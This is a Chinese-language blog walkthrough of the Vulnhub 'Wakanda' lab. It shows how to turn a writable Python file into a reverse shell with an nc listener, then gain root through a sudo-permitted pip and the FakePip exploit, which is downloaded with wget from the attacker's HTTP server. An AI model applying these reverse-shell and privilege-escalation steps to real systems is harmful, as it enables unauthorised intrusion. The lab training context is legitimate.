渗透测试实战-Vulnhub-Wakanda

Wakanda Vulhub - 幕布

Wakanda Vulhub
 
  • 接下来可以有两种方式得到devops的权限,一种是利用存在的python文件,利用编程,还有一种是利用msfvenom生成payload,将其放入原来的py文件,注释掉原来的代码,后面的侦听过程都是一致的
  • 第一种
    • 由此,看出这个文件的所属是devops,属组是developers,任何人都能修改,可以进行修改作为一个反向shell
      • 这里应该是socket编程,让它与攻击机的1235端口有连接
      • 然后在kali上侦听该端口,nc -lvvp 1235
        • 成功进入devops的shell
  • 想办法提权
    • 查看devops的root权限,发现在nopass的情况下只有pip可以使用
      • sudo -l命令
    • 关于pip命令,有一个漏洞可以利用,GitHub上有一个利用脚本Fakepip https://github.com/0x00-0x00/FakePip
    • 利用pip升级漏洞
      • 进行修改,主要是IP,监听的端口可以自行选择是否修改,但一定与后面监听的端口一致
        • 如图,默认的端口是 13372
      • 然后在当前的目录下利用python开启一个简单的http服务,提供靶机下载,python -m SimpleHTTPServer 8888
        • 然后在靶机上,wget http:192.168.56.103:8888/setup.py
      • 然后在靶机上使用root权限执行sudo /usr/bin/pip install . --upgrade --force-reinstall 执行这个EXp
      • 获得root权限后,查看根目录,得到最后一个flag
  • 至此找到了所有的flag 并获得了root权限




以上内容整理于
幕布

 

posted @ 2020-05-28 10:26  llzz38  阅读(1077)  评论(0)    收藏  举报